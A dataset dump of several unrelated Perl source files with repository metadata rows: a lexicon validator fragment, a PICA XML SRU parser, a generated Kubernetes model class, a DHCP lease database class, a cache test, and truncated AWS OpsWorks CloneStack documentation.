if (@B == 0) {
print "--> ERROR: lexicon.txt contains word $w with empty pronunciation.\n";
set_to_fail();
last;
}
$p = shift @B;
unshift @B, $w;
# now @A and @B should be the same.
if ($#A != $#B) {
print "--> ERROR: lexicon.txt and lexiconp.txt have mismatched lines '$_' versus '$x'; delete one (line $line_num).\n";
set_to_fail();
last;
}
for ($n = 0; $n < @A; $n++) {
if ($A[$n] ne $B[$n]) {
print "--> ERROR: lexicon.txt and lexiconp.txt have mismatched lines '$_' versus '$x'; delete one (line $line_num)\n";
set_to_fail();
last;
}
}
}
$x = <P>;
if (defined $x && $exit == 0) {
print "--> ERROR: lexicon.txt and lexiconp.txt have different numbers of lines (mismatch); delete one.\n";
set_to_fail();
}
}
# Checking extra_questions.txt -------------------------------
%distinguished = (); # Keep track of all phone-pairs including nonsilence that
# are distinguished (split apart) by extra_questions.txt,
# as $distinguished{$p1,$p2} = 1. This will be used to
# make sure that we don't have pairs of phones on the same
# line in nonsilence_phones.txt that can never be
# distinguished from each other by questions. (If any two
# phones appear on the same line in nonsilence_phones.txt,
# they share a tree root, and since the automatic
# question-building treats all phones that appear on the
# same line of nonsilence_phones.txt as being in the same
# group, we can never distinguish them without resorting to
# questions in extra_questions.txt.
print "Checking $dict/extra_questions.txt ...\n";
if (-s "$dict/extra_questions.txt") {
if (!open(EX, "<$dict/extra_questions.txt")) {
set_to_fail(); print "--> ERROR: fail to open $dict/extra_questions.txt\n";
}
$idx = 1;
$success = 1;
print "--> reading $dict/extra_questions.txt\n";
while(<EX>) {
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $dict/extra_questions.txt does not end in newline.\n";
set_to_fail();
}
my @row = split(" ", $_);
if (@row == 0) {
set_to_fail(); print "--> ERROR: empty line in $dict/extra_questions.txt\n";
}
foreach (0 .. @row-1) {
if(!$silence{@row[$_]} and !$nonsilence{@row[$_]}) {
set_to_fail(); print "--> ERROR: phone \"@row[$_]\" is not in {, non}silence.txt (line $idx, block ", $_+1, ")\n";
}
$idx ++;
}
%row_hash = ();
foreach $p (@row) { $row_hash{$p} = 1; }
foreach $p1 (@row) {
# Update %distinguished hash.
foreach $p2 (keys %nonsilence) {
if (!defined $row_hash{$p2}) { # for each p1 in this question and p2 not
# in this question (and in nonsilence
# phones)... mark p1,p2 as being split apart
$distinguished{$p1,$p2} = 1;
$distinguished{$p2,$p1} = 1;
}
}
}
}
close(EX);
$success == 0 || print "--> $dict/extra_questions.txt is OK\n";
} else { print "--> $dict/extra_questions.txt is empty (this is OK)\n";}
# check nonsilence_phones.txt again for phone-pairs that are never
# distnguishable. (note: this situation is normal and expected for silence
# phones, so we don't check it.)
if(!open(NS, "<$dict/nonsilence_phones.txt")) {
print "--> ERROR: fail to open $dict/nonsilence_phones.txt the second time\n"; exit 1;
}
$num_warn_nosplit = 0;
$num_warn_nosplit_limit = 10;
while(<NS>) {
my @row = split(" ", $_);
foreach $p1 (@row) {
foreach $p2 (@row) {
if ($p1 ne $p2 && ! $distinguished{$p1,$p2}) {
set_to_fail();
if ($num_warn_nosplit <= $num_warn_nosplit_limit) {
print "--> ERROR: phones $p1 and $p2 share a tree root but can never be distinguished by extra_questions.txt.\n";
}
if ($num_warn_nosplit == $num_warn_nosplit_limit) {
print "... Not warning any more times about this issue.\n";
}
if ($num_warn_nosplit == 0) {
print " (note: we started checking for this only recently. You can still build a system but\n";
print " phones $p1 and $p2 will be acoustically indistinguishable).\n";
}
$num_warn_nosplit++;
}
}
}
}
if ($exit == 1) { print "--> ERROR validating dictionary directory $dict (see detailed error messages above)\n"; exit 1;}
else { print "--> SUCCESS [validating dictionary directory $dict]\n"; }
exit 0;
| 35.173653 | 143 | 0.564692 |
ed915dd9dbaa87efc5b37cf280a74d4b127f6dd7 | 1,169 | pm | Perl | lib/Catmandu/Importer/SRU/Parser/ppxml.pm | jorol/Catmandu-PICA | 36cd67ca3486aa749d520bdccf90da99de0dcfb2 | [
"Artistic-1.0"
] | null | null | null | lib/Catmandu/Importer/SRU/Parser/ppxml.pm | jorol/Catmandu-PICA | 36cd67ca3486aa749d520bdccf90da99de0dcfb2 | [
"Artistic-1.0"
] | null | null | null | lib/Catmandu/Importer/SRU/Parser/ppxml.pm | jorol/Catmandu-PICA | 36cd67ca3486aa749d520bdccf90da99de0dcfb2 | [
"Artistic-1.0"
] | null | null | null | package Catmandu::Importer::SRU::Parser::ppxml;
our $VERSION = '1.00';
use Moo;
use PICA::Parser::PPXML;
sub parse {
my ( $self, $record ) = @_;
my $xml = $record->{recordData}->toString();
my $parser = PICA::Parser::PPXML->new( $xml );
return $parser->next;
}
1;
__END__
=head1 NAME
Catmandu::Importer::SRU::Parser::ppxml - Parse SRU response with PICA+ XML data (PPXML, a format variant of the Deutsche Nationalbibliothek) into Catmandu PICA
=head1 SYNOPSIS
my %attrs = (
base => 'http://services.dnb.de/sru/zdb',
query => 'zdbid = 24220127',
recordSchema => 'PicaPlus-xml' ,
parser => 'ppxml' ,
);
my $importer = Catmandu::Importer::SRU->new(%attrs);
To give an example for use of the L<catmandu> command line client:
catmandu convert SRU --base http://services.dnb.de/sru/zdb
--query "zdbid = 24220127"
--recordSchema PicaPlus-xml
--parser ppxml
to PICA --type plain
=head1 DESCRIPTION
Each ppxml response will be transformed into the format defined by
L<Catmandu::Importer::PICA>
=cut
| 23.857143 | 159 | 0.606501 |
73e588d394154b58125aeda51b53cab5d9ef5695 | 5,636 | pm | Perl | lib/Kubernetes/Object/ExtensionsV1beta1HostPortRange.pm | mrbobbytables/perl | 44a05ecf0c2f31056b08b2f736d386377030b04f | [
"Apache-2.0"
] | null | null | null | lib/Kubernetes/Object/ExtensionsV1beta1HostPortRange.pm | mrbobbytables/perl | 44a05ecf0c2f31056b08b2f736d386377030b04f | [
"Apache-2.0"
] | null | null | null | lib/Kubernetes/Object/ExtensionsV1beta1HostPortRange.pm | mrbobbytables/perl | 44a05ecf0c2f31056b08b2f736d386377030b04f | [
"Apache-2.0"
] | null | null | null |
=begin comment
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: v1.13.7
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
# Do not edit the class manually.
# Ref: https://openapi-generator.tech
#
package Kubernetes::Object::ExtensionsV1beta1HostPortRange;
require 5.6.0;
use strict;
use warnings;
use utf8;
use JSON qw(decode_json);
use Data::Dumper;
use Module::Runtime qw(use_module);
use Log::Any qw($log);
use Date::Parse;
use DateTime;
use base ( "Class::Accessor", "Class::Data::Inheritable" );
#
#HostPortRange defines a range of host ports that will be enabled by a policy for pods to use. It requires both the start and end to be defined. Deprecated: use HostPortRange from policy API Group instead.
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech). Do not edit the class manually.
# REF: https://openapi-generator.tech
#
=begin comment
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: v1.13.7
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
# Do not edit the class manually.
# Ref: https://openapi-generator.tech
#
__PACKAGE__->mk_classdata( 'attribute_map' => {} );
__PACKAGE__->mk_classdata( 'openapi_types' => {} );
__PACKAGE__->mk_classdata( 'method_documentation' => {} );
__PACKAGE__->mk_classdata( 'class_documentation' => {} );
# new plain object
sub new {
my ( $class, %args ) = @_;
my $self = bless {}, $class;
$self->init(%args);
return $self;
}
# initialize the object
sub init {
my ( $self, %args ) = @_;
foreach my $attribute ( keys %{ $self->attribute_map } ) {
my $args_key = $self->attribute_map->{$attribute};
$self->$attribute( $args{$args_key} );
}
}
# return perl hash
sub to_hash {
my $self = shift;
my $_hash = decode_json( JSON->new->convert_blessed->encode($self) );
return $_hash;
}
# used by JSON for serialization
sub TO_JSON {
my $self = shift;
my $_data = {};
foreach my $_key ( keys %{ $self->attribute_map } ) {
if ( defined $self->{$_key} ) {
$_data->{ $self->attribute_map->{$_key} } = $self->{$_key};
}
}
return $_data;
}
# from Perl hashref
sub from_hash {
my ( $self, $hash ) = @_;
# loop through attributes and use openapi_types to deserialize the data
while ( my ( $_key, $_type ) = each %{ $self->openapi_types } ) {
my $_json_attribute = $self->attribute_map->{$_key};
if ( $_type =~ /^array\[(.+)\]$/i ) { # array
my $_subclass = $1;
my @_array = ();
foreach my $_element ( @{ $hash->{$_json_attribute} } ) {
push @_array, $self->_deserialize( $_subclass, $_element );
}
$self->{$_key} = \@_array;
}
elsif ( $_type =~ /^hash\[string,(.+)\]$/i ) { # hash
my $_subclass = $1;
my %_hash = ();
while ( my ( $_key, $_element ) =
each %{ $hash->{$_json_attribute} } )
{
$_hash{$_key} = $self->_deserialize( $_subclass, $_element );
}
$self->{$_key} = \%_hash;
}
elsif ( exists $hash->{$_json_attribute} )
{ #hash(model), primitive, datetime
$self->{$_key} =
$self->_deserialize( $_type, $hash->{$_json_attribute} );
}
else {
$log->debugf( "Warning: %s (%s) does not exist in input hash\n",
$_key, $_json_attribute );
}
}
return $self;
}
# deserialize non-array data
sub _deserialize {
my ( $self, $type, $data ) = @_;
$log->debugf( "deserializing %s with %s", Dumper($data), $type );
if ( $type eq 'DateTime' ) {
return DateTime->from_epoch( epoch => str2time($data) );
}
elsif ( grep( /^$type$/, ( 'int', 'double', 'string', 'boolean' ) ) ) {
return $data;
}
else { # hash(model)
my $_instance = eval "Kubernetes::Object::$type->new()";
return $_instance->from_hash($data);
}
}
__PACKAGE__->class_documentation(
{
description =>
'HostPortRange defines a range of host ports that will be enabled by a policy for pods to use. It requires both the start and end to be defined. Deprecated: use HostPortRange from policy API Group instead.',
class => 'ExtensionsV1beta1HostPortRange',
required => [], # TODO
}
);
__PACKAGE__->method_documentation(
{
'max' => {
datatype => 'int',
base_name => 'max',
description => 'max is the end of the range, inclusive.',
format => '',
read_only => '',
},
'min' => {
datatype => 'int',
base_name => 'min',
description => 'min is the start of the range, inclusive.',
format => '',
read_only => '',
},
}
);
__PACKAGE__->openapi_types(
{
'max' => 'int',
'min' => 'int'
}
);
__PACKAGE__->attribute_map(
{
'max' => 'max',
'min' => 'min'
}
);
__PACKAGE__->mk_accessors( keys %{ __PACKAGE__->attribute_map } );
1;
| 26.838095 | 208 | 0.575053 |
ed02b1c3a749de182088f75bb04f5ac632c26d83 | 1,333 | pm | Perl | lib/App/Manoc/DB/Result/DHCPLease.pm | gmambro/manoc | 1c25734028970b4fda548c9d4aa8cc47eb67bc6d | [
"Artistic-1.0"
] | 3 | 2015-06-21T18:23:17.000Z | 2017-06-11T23:19:29.000Z | lib/App/Manoc/DB/Result/DHCPLease.pm | gmambro/manoc | 1c25734028970b4fda548c9d4aa8cc47eb67bc6d | [
"Artistic-1.0"
] | 34 | 2015-06-20T07:27:30.000Z | 2022-01-17T10:28:28.000Z | lib/App/Manoc/DB/Result/DHCPLease.pm | gmambro/manoc | 1c25734028970b4fda548c9d4aa8cc47eb67bc6d | [
"Artistic-1.0"
] | 1 | 2019-11-18T08:15:03.000Z | 2019-11-18T08:15:03.000Z | package App::Manoc::DB::Result::DHCPLease;
#ABSTRACT: A model object for DHCP leases
use strict;
use warnings;
##VERSION
use parent 'App::Manoc::DB::Result';
__PACKAGE__->load_components(qw/+App::Manoc::DB::InflateColumn::IPv4/);
__PACKAGE__->table('dhcp_lease');
__PACKAGE__->add_columns(
'id' => {
data_type => 'int',
is_auto_increment => 1,
is_nullable => 0,
},
'macaddr' => {
data_type => 'varchar',
is_nullable => 0,
size => 17
},
'ipaddr' => {
data_type => 'varchar',
is_nullable => 0,
size => 15,
ipv4_address => 1,
},
'hostname' => {
data_type => 'varchar',
size => 255,
is_nullable => 0,
},
'start' => {
data_type => 'int',
is_nullable => 0,
},
'end' => {
data_type => 'int',
is_nullable => 0,
},
'status' => {
data_type => 'varchar',
size => 16,
},
'dhcp_server_id' => {
data_type => 'int',
is_foreign_key => 1,
is_nullable => 0,
},
);
__PACKAGE__->belongs_to(
dhcp_server => 'App::Manoc::DB::Result::DHCPServer',
{ 'foreign.id' => 'self.dhcp_server_id' },
);
__PACKAGE__->set_primary_key('id');
1;
| 19.042857 | 71 | 0.489122 |
ed41271155bfb1a25827350b21e2258f98c4f002 | 1,598 | t | Perl | t/basic.t | karenetheridge/Cache-Cascade | 49436cefdd1034afe4d61cdda5ad55218b9025a5 | [
"Artistic-1.0"
] | null | null | null | t/basic.t | karenetheridge/Cache-Cascade | 49436cefdd1034afe4d61cdda5ad55218b9025a5 | [
"Artistic-1.0"
] | null | null | null | t/basic.t | karenetheridge/Cache-Cascade | 49436cefdd1034afe4d61cdda5ad55218b9025a5 | [
"Artistic-1.0"
] | null | null | null | use strict;
use warnings;
use Test::More tests => 26;
use ok "Cache::Cascade";
{
package MemCache;
sub new { bless {}, shift }
sub get { $_[0]{$_[1]} }
sub set { $_[0]{$_[1]} = $_[2] }
sub remove { delete $_[0]{$_[1]} }
}
my @caches = map { MemCache->new } 1 .. 3;
my $cache = Cache::Cascade->new( caches => \@caches );
isa_ok( $cache, "Cache::Cascade" );
is( $cache->get("foo"), undef, "no key yet" );
$caches[-1]->set( foo => "bar" );
is( $caches[-1]->get("foo"), "bar", "last cache stored" );
is( $caches[0]->get("foo"), undef, "first cache unaffected" );
is( $cache->get("foo"), "bar", "value gotten from lowest" );
$caches[0]->set( foo => "gorch" );
is( $cache->get("foo"), "gorch", "value gotten from highest" );
is( $caches[-1]->get("foo"), "bar", "foo is still bar in lowest" );
$cache->set( foo => "moose" );
is( $_->get("foo"), "moose", "stored in child" ) for @caches;
$cache->set_deep(0);
$cache->set( foo => "elk" );
is( $caches[0]->get("foo"), "elk", "set in highest" );
is( $caches[1]->get("foo"), "moose", "but not in others" );
$cache->remove("foo");
is( $_->get("foo"), undef, "removed from child" ) for @caches;
$cache->float_hits(1);
$caches[-1]->set( foo => "camel" );
is( $caches[0]->get("foo"), undef, "value not yet floated" );
is( $cache->get("foo"), "camel", "get from bottom" );
is( $_->get("foo"), "camel", "value floated" ) for @caches;
$caches[-1]->set( bar => "" );
is( $caches[0]->get("bar"), undef, "value not yet floated" );
is( $cache->get("bar"), "", "get from bottom" );
is( $_->get("bar"), "", "value floated" ) for @caches;
| 22.828571 | 67 | 0.562578 |
73dc1c3511e5dc75f8d331444bcbffb4c93617d7 | 2,990 | pm | Perl | auto-lib/Paws/WAFRegional/ListSqlInjectionMatchSets.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 164 | 2015-01-08T14:58:53.000Z | 2022-02-20T19:16:24.000Z | auto-lib/Paws/WAFRegional/ListSqlInjectionMatchSets.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 348 | 2015-01-07T22:08:38.000Z | 2022-01-27T14:34:44.000Z | auto-lib/Paws/WAFRegional/ListSqlInjectionMatchSets.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 87 | 2015-04-22T06:29:47.000Z | 2021-09-29T14:45:55.000Z |
package Paws::WAFRegional::ListSqlInjectionMatchSets;
use Moose;
has Limit => (is => 'ro', isa => 'Int');
has NextMarker => (is => 'ro', isa => 'Str');
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'ListSqlInjectionMatchSets');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::WAFRegional::ListSqlInjectionMatchSetsResponse');
class_has _result_key => (isa => 'Str', is => 'ro');
1;
### main pod documentation begin ###
=head1 NAME
Paws::WAFRegional::ListSqlInjectionMatchSets - Arguments for method ListSqlInjectionMatchSets on L<Paws::WAFRegional>
=head1 DESCRIPTION
This class represents the parameters used for calling the method ListSqlInjectionMatchSets on the
L<AWS WAF Regional|Paws::WAFRegional> service. Use the attributes of this class
as arguments to method ListSqlInjectionMatchSets.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to ListSqlInjectionMatchSets.
=head1 SYNOPSIS
my $waf-regional = Paws->service('WAFRegional');
# To list SQL injection match sets
# The following example returns an array of up to 100 SQL injection match sets.
my $ListSqlInjectionMatchSetsResponse =
$waf -regional->ListSqlInjectionMatchSets( 'Limit' => 100 );
# Results:
my $SqlInjectionMatchSets =
$ListSqlInjectionMatchSetsResponse->SqlInjectionMatchSets;
# Returns a L<Paws::WAFRegional::ListSqlInjectionMatchSetsResponse> object.
Values for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
For the AWS API documentation, see L<https://docs.aws.amazon.com/goto/WebAPI/waf-regional/ListSqlInjectionMatchSets>
=head1 ATTRIBUTES
=head2 Limit => Int
Specifies the number of SqlInjectionMatchSet objects that you want AWS
WAF to return for this request. If you have more
C<SqlInjectionMatchSet> objects than the number you specify for
C<Limit>, the response includes a C<NextMarker> value that you can use
to get another batch of C<Rules>.
=head2 NextMarker => Str
If you specify a value for C<Limit> and you have more
SqlInjectionMatchSet objects than the value of C<Limit>, AWS WAF
returns a C<NextMarker> value in the response that allows you to list
another group of C<SqlInjectionMatchSets>. For the second and
subsequent C<ListSqlInjectionMatchSets> requests, specify the value of
C<NextMarker> from the previous response to get information about
another batch of C<SqlInjectionMatchSets>.
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method ListSqlInjectionMatchSets in L<Paws::WAFRegional>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: L<https://github.com/pplu/aws-sdk-perl>
Please report bugs to: L<https://github.com/pplu/aws-sdk-perl/issues>
=cut
| 36.024096 | 249 | 0.762542 |
ed9c2627c5d8d8e51239afbe64b7b925d202b69e | 15,819 | pm | Perl | auto-lib/Paws/OpsWorks/CloneStack.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 164 | 2015-01-08T14:58:53.000Z | 2022-02-20T19:16:24.000Z | auto-lib/Paws/OpsWorks/CloneStack.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 348 | 2015-01-07T22:08:38.000Z | 2022-01-27T14:34:44.000Z | auto-lib/Paws/OpsWorks/CloneStack.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 87 | 2015-04-22T06:29:47.000Z | 2021-09-29T14:45:55.000Z |
package Paws::OpsWorks::CloneStack;
use Moose;
has AgentVersion => (is => 'ro', isa => 'Str');
has Attributes => (is => 'ro', isa => 'Paws::OpsWorks::StackAttributes');
has ChefConfiguration => (is => 'ro', isa => 'Paws::OpsWorks::ChefConfiguration');
has CloneAppIds => (is => 'ro', isa => 'ArrayRef[Str|Undef]');
has ClonePermissions => (is => 'ro', isa => 'Bool');
has ConfigurationManager => (is => 'ro', isa => 'Paws::OpsWorks::StackConfigurationManager');
has CustomCookbooksSource => (is => 'ro', isa => 'Paws::OpsWorks::Source');
has CustomJson => (is => 'ro', isa => 'Str');
has DefaultAvailabilityZone => (is => 'ro', isa => 'Str');
has DefaultInstanceProfileArn => (is => 'ro', isa => 'Str');
has DefaultOs => (is => 'ro', isa => 'Str');
has DefaultRootDeviceType => (is => 'ro', isa => 'Str');
has DefaultSshKeyName => (is => 'ro', isa => 'Str');
has DefaultSubnetId => (is => 'ro', isa => 'Str');
has HostnameTheme => (is => 'ro', isa => 'Str');
has Name => (is => 'ro', isa => 'Str');
has Region => (is => 'ro', isa => 'Str');
has ServiceRoleArn => (is => 'ro', isa => 'Str', required => 1);
has SourceStackId => (is => 'ro', isa => 'Str', required => 1);
has UseCustomCookbooks => (is => 'ro', isa => 'Bool');
has UseOpsworksSecurityGroups => (is => 'ro', isa => 'Bool');
has VpcId => (is => 'ro', isa => 'Str');
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'CloneStack');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::OpsWorks::CloneStackResult');
class_has _result_key => (isa => 'Str', is => 'ro');
1;
### main pod documentation begin ###
=head1 NAME
Paws::OpsWorks::CloneStack - Arguments for method CloneStack on L<Paws::OpsWorks>
=head1 DESCRIPTION
This class represents the parameters used for calling the method CloneStack on the
L<AWS OpsWorks|Paws::OpsWorks> service. Use the attributes of this class
as arguments to method CloneStack.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to CloneStack.
=head1 SYNOPSIS
my $opsworks = Paws->service('OpsWorks');
my $CloneStackResult = $opsworks->CloneStack(
ServiceRoleArn => 'MyString',
SourceStackId => 'MyString',
AgentVersion => 'MyString', # OPTIONAL
Attributes => {
'Color' => 'MyString', # key: values: Color
}, # OPTIONAL
ChefConfiguration => {
BerkshelfVersion => 'MyString',
ManageBerkshelf => 1, # OPTIONAL
}, # OPTIONAL
CloneAppIds => [ 'MyString', ... ], # OPTIONAL
ClonePermissions => 1, # OPTIONAL
ConfigurationManager => {
Name => 'MyString',
Version => 'MyString',
}, # OPTIONAL
CustomCookbooksSource => {
Password => 'MyString',
Revision => 'MyString',
SshKey => 'MyString',
Type => 'git', # values: git, svn, archive, s3; OPTIONAL
Url => 'MyString',
Username => 'MyString',
}, # OPTIONAL
CustomJson => 'MyString', # OPTIONAL
DefaultAvailabilityZone => 'MyString', # OPTIONAL
DefaultInstanceProfileArn => 'MyString', # OPTIONAL
DefaultOs => 'MyString', # OPTIONAL
DefaultRootDeviceType => 'ebs', # OPTIONAL
DefaultSshKeyName => 'MyString', # OPTIONAL
DefaultSubnetId => 'MyString', # OPTIONAL
HostnameTheme => 'MyString', # OPTIONAL
Name => 'MyString', # OPTIONAL
Region => 'MyString', # OPTIONAL
UseCustomCookbooks => 1, # OPTIONAL
UseOpsworksSecurityGroups => 1, # OPTIONAL
VpcId => 'MyString', # OPTIONAL
);
# Results:
my $StackId = $CloneStackResult->StackId;
# Returns a L<Paws::OpsWorks::CloneStackResult> object.
Values for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
For the AWS API documentation, see L<https://docs.aws.amazon.com/goto/WebAPI/opsworks/CloneStack>
=head1 ATTRIBUTES
=head2 AgentVersion => Str
The default AWS OpsWorks Stacks agent version. You have the following
options:
=over
=item *
Auto-update - Set this parameter to C<LATEST>. AWS OpsWorks Stacks
automatically installs new agent versions on the stack's instances as
soon as they are available.
=item *
Fixed version - Set this parameter to your preferred agent version. To
update the agent version, you must edit the stack configuration and
specify a new version. AWS OpsWorks Stacks then automatically installs
that version on the stack's instances.
=back
The default setting is C<LATEST>. To specify an agent version, you must
use the complete version number, not the abbreviated number shown on
the console. For a list of available agent version numbers, call
DescribeAgentVersions. AgentVersion cannot be set to Chef 12.2.
You can also specify an agent version when you create or update an
instance, which overrides the stack's default setting.
=head2 Attributes => L<Paws::OpsWorks::StackAttributes>
A list of stack attributes and values as key/value pairs to be added to
the cloned stack.
=head2 ChefConfiguration => L<Paws::OpsWorks::ChefConfiguration>
A C<ChefConfiguration> object that specifies whether to enable
Berkshelf and the Berkshelf version on Chef 11.10 stacks. For more
information, see Create a New Stack
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingstacks-creating.html).
=head2 CloneAppIds => ArrayRef[Str|Undef]
A list of source stack app IDs to be included in the cloned stack.
=head2 ClonePermissions => Bool
Whether to clone the source stack's permissions.
=head2 ConfigurationManager => L<Paws::OpsWorks::StackConfigurationManager>
The configuration manager. When you clone a stack we recommend that you
use the configuration manager to specify the Chef version: 12, 11.10,
or 11.4 for Linux stacks, or 12.2 for Windows stacks. The default value
for Linux stacks is currently 12.
=head2 CustomCookbooksSource => L<Paws::OpsWorks::Source>
Contains the information required to retrieve an app or cookbook from a
repository. For more information, see Adding Apps
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingapps-creating.html)
or Cookbooks and Recipes
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingcookbook.html).
=head2 CustomJson => Str
A string that contains user-defined, custom JSON. It is used to
override the corresponding default stack configuration JSON values. The
string should be in the following format:
C<"{\"key1\": \"value1\", \"key2\": \"value2\",...}">
For more information about custom JSON, see Use Custom JSON to Modify
the Stack Configuration Attributes
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingstacks-json.html)
=head2 DefaultAvailabilityZone => Str
The cloned stack's default Availability Zone, which must be in the
specified region. For more information, see Regions and Endpoints
(https://docs.aws.amazon.com/general/latest/gr/rande.html). If you also
specify a value for C<DefaultSubnetId>, the subnet must be in the same
zone. For more information, see the C<VpcId> parameter description.
=head2 DefaultInstanceProfileArn => Str
The Amazon Resource Name (ARN) of an IAM profile that is the default
profile for all of the stack's EC2 instances. For more information
about IAM ARNs, see Using Identifiers
(https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html).
=head2 DefaultOs => Str
The stack's operating system, which must be set to one of the
following.
=over
=item *
A supported Linux operating system: An Amazon Linux version, such as
C<Amazon Linux 2018.03>, C<Amazon Linux 2017.09>, C<Amazon Linux
2017.03>, C<Amazon Linux 2016.09>, C<Amazon Linux 2016.03>, C<Amazon
Linux 2015.09>, or C<Amazon Linux 2015.03>.
=item *
A supported Ubuntu operating system, such as C<Ubuntu 16.04 LTS>,
C<Ubuntu 14.04 LTS>, or C<Ubuntu 12.04 LTS>.
=item *
C<CentOS Linux 7>
=item *
C<Red Hat Enterprise Linux 7>
=item *
C<Microsoft Windows Server 2012 R2 Base>, C<Microsoft Windows Server
2012 R2 with SQL Server Express>, C<Microsoft Windows Server 2012 R2
with SQL Server Standard>, or C<Microsoft Windows Server 2012 R2 with
SQL Server Web>.
=item *
A custom AMI: C<Custom>. You specify the custom AMI you want to use
when you create instances. For more information about how to use custom
AMIs with OpsWorks, see Using Custom AMIs
(https://docs.aws.amazon.com/opsworks/latest/userguide/workinginstances-custom-ami.html).
=back
The default option is the parent stack's operating system. For more
information about supported operating systems, see AWS OpsWorks Stacks
Operating Systems
(https://docs.aws.amazon.com/opsworks/latest/userguide/workinginstances-os.html).
You can specify a different Linux operating system for the cloned
stack, but you cannot change from Linux to Windows or Windows to Linux.
=head2 DefaultRootDeviceType => Str
The default root device type. This value is used by default for all
instances in the cloned stack, but you can override it when you create
an instance. For more information, see Storage for the Root Device
(https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ComponentsAMIs.html#storage-for-the-root-device).
Valid values are: C<"ebs">, C<"instance-store">
=head2 DefaultSshKeyName => Str
A default Amazon EC2 key pair name. The default value is none. If you
specify a key pair name, AWS OpsWorks installs the public key on the
instance and you can use the private key with an SSH client to log in
to the instance. For more information, see Using SSH to Communicate
with an Instance
(https://docs.aws.amazon.com/opsworks/latest/userguide/workinginstances-ssh.html)
and Managing SSH Access
(https://docs.aws.amazon.com/opsworks/latest/userguide/security-ssh-access.html).
You can override this setting by specifying a different key pair, or no
key pair, when you create an instance
(https://docs.aws.amazon.com/opsworks/latest/userguide/workinginstances-add.html).
=head2 DefaultSubnetId => Str
The stack's default VPC subnet ID. This parameter is required if you
specify a value for the C<VpcId> parameter. All instances are launched
into this subnet unless you specify otherwise when you create the
instance. If you also specify a value for C<DefaultAvailabilityZone>,
the subnet must be in that zone. For information on default values and
when this parameter is required, see the C<VpcId> parameter
description.
=head2 HostnameTheme => Str
The stack's host name theme, with spaces are replaced by underscores.
The theme is used to generate host names for the stack's instances. By
default, C<HostnameTheme> is set to C<Layer_Dependent>, which creates
host names by appending integers to the layer's short name. The other
themes are:
=over
=item *
C<Baked_Goods>
=item *
C<Clouds>
=item *
C<Europe_Cities>
=item *
C<Fruits>
=item *
C<Greek_Deities_and_Titans>
=item *
C<Legendary_creatures_from_Japan>
=item *
C<Planets_and_Moons>
=item *
C<Roman_Deities>
=item *
C<Scottish_Islands>
=item *
C<US_Cities>
=item *
C<Wild_Cats>
=back
To obtain a generated host name, call C<GetHostNameSuggestion>, which
returns a host name based on the current theme.
=head2 Name => Str
The cloned stack name.
=head2 Region => Str
The cloned stack AWS region, such as "ap-northeast-2". For more
information about AWS regions, see Regions and Endpoints
(https://docs.aws.amazon.com/general/latest/gr/rande.html).
=head2 B<REQUIRED> ServiceRoleArn => Str
The stack AWS Identity and Access Management (IAM) role, which allows
AWS OpsWorks Stacks to work with AWS resources on your behalf. You must
set this parameter to the Amazon Resource Name (ARN) for an existing
IAM role. If you create a stack by using the AWS OpsWorks Stacks
console, it creates the role for you. You can obtain an existing
stack's IAM ARN programmatically by calling DescribePermissions. For
more information about IAM ARNs, see Using Identifiers
(https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html).
You must set this parameter to a valid service role ARN or the action
will fail; there is no default value. You can specify the source
stack's service role ARN, if you prefer, but you must do so explicitly.
=head2 B<REQUIRED> SourceStackId => Str
The source stack ID.
=head2 UseCustomCookbooks => Bool
Whether to use custom cookbooks.
=head2 UseOpsworksSecurityGroups => Bool
Whether to associate the AWS OpsWorks Stacks built-in security groups
with the stack's layers.
AWS OpsWorks Stacks provides a standard set of built-in security
groups, one for each layer, which are associated with layers by
default. With C<UseOpsworksSecurityGroups> you can instead provide your
own custom security groups. C<UseOpsworksSecurityGroups> has the
following settings:
=over
=item *
True - AWS OpsWorks Stacks automatically associates the appropriate
built-in security group with each layer (default setting). You can
associate additional security groups with a layer after you create it
but you cannot delete the built-in security group.
=item *
False - AWS OpsWorks Stacks does not associate built-in security groups
with layers. You must create appropriate Amazon Elastic Compute Cloud
(Amazon EC2) security groups and associate a security group with each
layer that you create. However, you can still manually associate a
